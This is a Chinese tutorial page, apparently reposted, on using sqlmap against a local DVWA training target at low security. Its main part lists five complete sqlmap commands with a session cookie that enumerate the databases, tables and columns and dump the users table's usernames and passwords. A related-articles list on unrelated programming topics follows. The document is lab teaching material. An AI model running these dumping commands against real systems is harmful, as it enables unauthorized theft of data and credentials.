使用Sqlmap對dvwa進行sql注入測試(初級階段)

0.測試準備

1)打開Kali虛擬機終端;
在這里插入圖片描述
2)打開靶機OWASP,并通過瀏覽器,輸入IP地址進入dvwa的主頁,然后選擇SQL injection進入SQL注入的測試頁面
在這里插入圖片描述在這里插入圖片描述在這里插入圖片描述

1.獲取DVWA的url和cookie

在輸入框中輸入1,顯示有內容,此時利用此URL進行SQL注入。
輸入document.cookie獲取頁面的cookie。去除remem_token字段的內容,用于下文的sql注入終端的cookie。
在這里插入圖片描述

3.在終端開始測試

1)終端中輸入指令一:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” --dbs
在這里插入圖片描述結果如下,說明找到了連個數據庫dvwa和information_schema,接下來獲取數據庫dvwa 中的表格。
在這里插入圖片描述2)在終端中輸入指令二:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa --tables
在這里插入圖片描述結果如下,發現有兩個表格,guestbook和users,接下來獲取users數據表中有哪些列。
在這里插入圖片描述3)在終端中輸入指令三:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --columns
在這里插入圖片描述結果如下,說明users一共有六列,接下來獲取具體內容
在這里插入圖片描述
4)在終端中輸入指令四,有提示信息則輸入y:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --dump
在這里插入圖片描述結果如下,表格中的數據即顯示。
在這里插入圖片描述5)若數據庫中數據較多,可在終端中輸入指令五,只輸出用戶名和密碼字段:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users -C “user,password” --dump

在這里插入圖片描述
結束!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/452735.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/452735.shtml
英文地址,請注明出處:http://en.pswp.cn/news/452735.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

什么是軟件生命周期

什么是軟件生命周期

軟件生命周期又稱為軟件生存周期或系統開發生命周期,是軟件的產生直到報廢的生命周期,周期內有問題定義、可行性分析、總體描述、系統設計、編碼、調試和測試、驗收與運行、維護升級到廢棄等階段,這種按時間分程的思想方法是軟件工程中的一種…
閱讀更多...
STL中map和string, vector 用法詳解

STL中map和string, vector 用法詳解

1. map 用法詳解 std map是STL的一個關聯容器,它提供一對一(其中第一個可以稱為關鍵字,每個關鍵字只能在map中出現一次,第二個可能稱為該關鍵字的值)的數據處理能力,由于這個特性,它完成有可能…
閱讀更多...
如果備份還原SecureCRT、Xshell遠程工具遠程

如果備份還原SecureCRT、Xshell遠程工具遠程

因為有時候電腦操作系統要重新安裝,需要將遠程備份下來。或者要將遠程發給其他同事。一、如何備份還原SecureCRT遠程1、打開options-global options---general---configuration paths找到配置文件保存路徑,如下圖:2、打開C:\Users\NUC\AppDat…
閱讀更多...
Centos7 下yum安裝mysql

Centos7 下yum安裝mysql

轉載于:https://www.cnblogs.com/nbjjy/p/9023991.html
閱讀更多...
Python協程--迭代器

Python協程--迭代器

0. 實現一個可以迭代的對象 1)要想使一個對象實現迭代的功能,須實現__iter__和__next__方法。 2)判斷classmate是否是可以迭代的對象: from collections import Iterable isinstance(classmate, Iterable)結果為True則說明是可以…
閱讀更多...
什么是敏捷開發

什么是敏捷開發

什么是敏捷開發? 敏捷開發(Agile Development)是一種以人為核心、迭代、循序漸進的開發方法。 怎么理解呢?首先,我們要理解它不是一門技術,它是一種開發方法,也就是一種軟件開發的流程,它會指導我們用規定的…
閱讀更多...
May 18:PHP 輸出語句

May 18:PHP 輸出語句

通過前面的學習了解了php的基本語法,今天向大家簡單介紹php的幾種輸出方式: 1. echo 常用的輸出語句,例如:echo helloworld!; 2. print() 輸出語句,有返回值。例如:print(helloworld&#x…
閱讀更多...
SendMessage、PostMessage原理和源代碼詳解

SendMessage、PostMessage原理和源代碼詳解

本文講解SendMessage、PostMessage兩個函數的實現原理,分為三個步驟進行講解,分別適合初級、中級、高級程序員進行理解,三個步驟分別為: 1、SendMessage、PostMessage的運行機制。 2、SendMessage、PostMessage的運行內幕。 3、…
閱讀更多...
Python協程--實現斐波那契數列(Fibonacci)的幾種方式

Python協程--實現斐波那契數列(Fibonacci)的幾種方式

1.使用for遍歷list數組 # 使用for遍歷list數組 nums list() a 0 b 1 i 0while i < 10:nums.append(a)a, b b, abi 1for num in nums:print(num)2.使用迭代器完成 class Fibonacci(object):def __init__(self, all_num):self.all_num all_numself.current_num 0sel…
閱讀更多...
敏捷開發宣言

敏捷開發宣言

敏捷開發宣言&#xff1a; 1. 個體和交互勝過過程和工具 2. 可工作的軟件勝過面面俱到的文檔 3. 客戶協作勝過合同談判 4. 響應變化勝過遵循計劃 從上面的宣言可以看出&#xff0c;敏捷開發的核心是人 、協作、時刻可運行的軟件、變化。
閱讀更多...
java fast math,Java FastMath.signum方法代碼示例

java fast math,Java FastMath.signum方法代碼示例

import org.apache.commons.math3.util.FastMath; //導入方法依賴的package包/類/*** {inheritDoc}*/Overrideprotected double doSolve()throws TooManyEvaluationsException,NoBracketingException {double min getMin();double max getMax();// [x1, x2] is the bracketin…
閱讀更多...
什么是可行性研究

什么是可行性研究

1.并非任何問題都有簡單明顯的解決辦法&#xff0c;事實上&#xff0c;許多問題不可能在預定的系統規模或時間期限之內解決。2.如果問題沒有可行的解&#xff0c;那么花費在這項工程上的任何時間、人力、軟硬件資源和經費&#xff0c;都是無謂的浪費。3.可行性研究的目的&#…
閱讀更多...
FTP服務的簡介和配置詳解

FTP服務的簡介和配置詳解

FTP服務的簡介和配置詳解注意&#xff1a;配置FTP服務時&#xff0c;最好關閉防火墻和selinux1、FTP服務簡介FTP 是File Transfer Protocol&#xff08;文件傳輸協議&#xff09;的英文簡稱&#xff0c;而中文簡稱為“文件傳輸協議”。用于Internet上的控制文件的雙向傳輸。同時…
閱讀更多...
Python協程--生成器(通過異常來判斷生成器已經結束)

Python協程--生成器(通過異常來判斷生成器已經結束)

以實現斐波那契數列為例&#xff1a; def create_num(all_num):a, b 0, 1current_num 0while current_num < all_num:yield a # 如果一個函數中有yield語句&#xff0c;那么這個就不在是函數&#xff0c;而是一個生成器的模板a, b b, abcurrent_num 1return "ok.…
閱讀更多...
四種類型轉換 cast

四種類型轉換 cast

1.static_cast 2.dynamic_cast 3.const_cast 4. reinterpret_cast 例子1&#xff1a; float x; cout<<static_cast<int>(x); ... f(static_cast<string>("hello")); 例子2&#xff1a; class Car; class Cabriolet:pbulic Car { …
閱讀更多...
java獲取不重復訂單號,Java 生成永不重復的訂單號

java獲取不重復訂單號,Java 生成永不重復的訂單號

package com.taiping.test;import java.text.SimpleDateFormat;import java.util.Date;import java.util.Random;public class Test12 {/*** 生成永不重復的訂單號* param startLetter 訂單號開頭字符串* param size 訂單號中隨機的大寫字母個數* return*/public static String…
閱讀更多...
CSS中position屬性(abusolute | relative | static | fixed)區別

CSS中position屬性(abusolute | relative | static | fixed)區別

關于css3中position屬性的定義&#xff1a; 轉載于:https://www.cnblogs.com/tangjiao/p/9025934.html
閱讀更多...
什么是系統流程圖

什么是系統流程圖

系統流程圖是概括地描繪物理系統的傳統工具。它的基本思想是用圖形符號以黑盒子的形式描繪組成系統的每個部件&#xff08;程序&#xff0c;文檔&#xff0c;數據庫&#xff0c;人工過程等&#xff09;。系統流程圖表達的是數據在系統各部件之間流動的情況&#xff0c;而不是對…
閱讀更多...
Python協程--生成器(實現多任務)

Python協程--生成器(實現多任務)

0.生成器 1.使用yield完成多任務 import timedef task_1():while True:print("---1----")time.sleep(0.1)yielddef task_2():while True:print("---2----")time.sleep(0.1)yielddef main():t1 task_1()t2 task_2()# 先讓t1運行一會&#xff0c;當t1中遇…
閱讀更多...
技術分享連載(六十一)

技術分享連載(六十一)

資源管理 Q1&#xff1a;Unity5.4.1中&#xff0c;我將需要的Shader打到一個AssetBundle包中&#xff08;包含一個關聯了所有Shader的Shader Variants&#xff09;&#xff0c;分別用Shader.WarmupAllShaders和ShaderVariantCollection.WarmUp兩種方式進行預加載&#xff0c;后…
閱讀更多...
最新文章

Copyright @ 2022~2023